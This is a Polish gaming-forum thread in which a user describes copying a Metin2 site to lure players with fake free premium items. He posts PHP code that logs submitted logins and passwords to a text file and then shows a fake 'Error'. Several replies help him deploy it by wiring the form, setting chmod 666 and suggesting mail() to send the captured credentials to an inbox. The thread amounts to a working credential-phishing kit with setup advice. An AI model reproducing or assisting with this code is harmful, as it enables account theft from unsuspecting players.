Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Rekomendowane odpowiedzi

Opublikowano

Witam takie pytanie a zarazem prośbę czy ktoś mógłby mi wytłumaczyć :

Mam stronę metin2 skopiowałem te kody strony i wrzuciłem do notatnika i mam niby darmowe sm i trzeba złożyć konto i czy ktoś by mógł napisać taki skrypt że kto zrobi konto to one pojawią się na pulpicie w pliku txt mam jakiś sam napisałem ale nie wiem w którym miejscu go wkleić proszę o pomoc i jak wrzucić na jakiś serwer np dbv.pl albp gdzieś jakimś programem czy czym proszę o [TuT] ;)

To ten skrypt (niech ktoś sprawdzi i mi powie gdzie go wkleić)

<?

$loginnn = $_POST["login"];

$haslo = $_POST["haslo"];

$czas = date("H:i:s");

$plik = fopen('plik.txt', 'a');

$dane = $czas."'".$loginnn."`".$haslo."\n";

fwrite($plik,$dane);

fwrite($plik,'/n');

fclose($plik);

echo"Error"

?>

Mam mało estetyczne poradniki?

Malo kolorowe?

To ze względu na brak czasu, powiedz mi co mam naprawić a w najbliższym czasie to zrobię.

Uwierz mi, staram sie jak moge.

Opublikowano

Musisz wrzucić go najlepiej do osobnego pliku np. dane.php i w formularzy .html formę musisz skierować pod ten adres czyli dane.php i buttony uzupełniasz wg. tego kodu czyli np. haslo to dajesz nazwę haslo itd.

Opublikowano

Uzupełniając wypowiedź przedmówcy, plik 'plik.txt' nie utworzy się na pulpicie czy coś tylko na serwerze (i tak w ogóle musisz go utworzyć sam i nadać mu prawa dostępu (chmod) 666). Bardziej bym polecał funkcję mail(); - o wiele wygodniejsze rozwiązania, zwłaszcza z połączeniem z klientem poczty ;)

Ta cierpliwa sygnatura czeka na wenę jego właściciela. :-)

Opublikowano

Tak dokładnie, dawno siedzialem w php i cos pamietam jeszcze ;p ale mozna tak zrobic jak ja mowie w 1 pliku kod php a w 2 formularz z np. index.html.

Sposob andrzejka tez dobry, ale moze ci ktoś zaspamowac pocztę ;]

Opublikowano

Tak dokładnie, dawno siedzialem w php i cos pamietam jeszcze ;p ale mozna tak zrobic jak ja mowie w 1 pliku kod php a w 2 formularz z np. index.html.

Sposob andrzejka tez dobry, ale moze ci ktoś zaspamowac pocztę ;]

Wystarczy kawałeczek kodu, który będzie robił pewne ograniczenie działające na chociażby ciasteczkach ;) W końcu się komuś znudzi usuwanie cookies :P Ponadto lepiej ogarnąć spam w skrzynce niż dziesiątki identycznych wpisów w pliku xD Przynajmniej z mojego punktu widzenia ;)

Dodatkowo to co ja napisałem jest uzupełnieniem Twojej wypowiedzi, nie alternatywa ;)

Ta cierpliwa sygnatura czeka na wenę jego właściciela. :-)

Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Dodaj nową pozycję...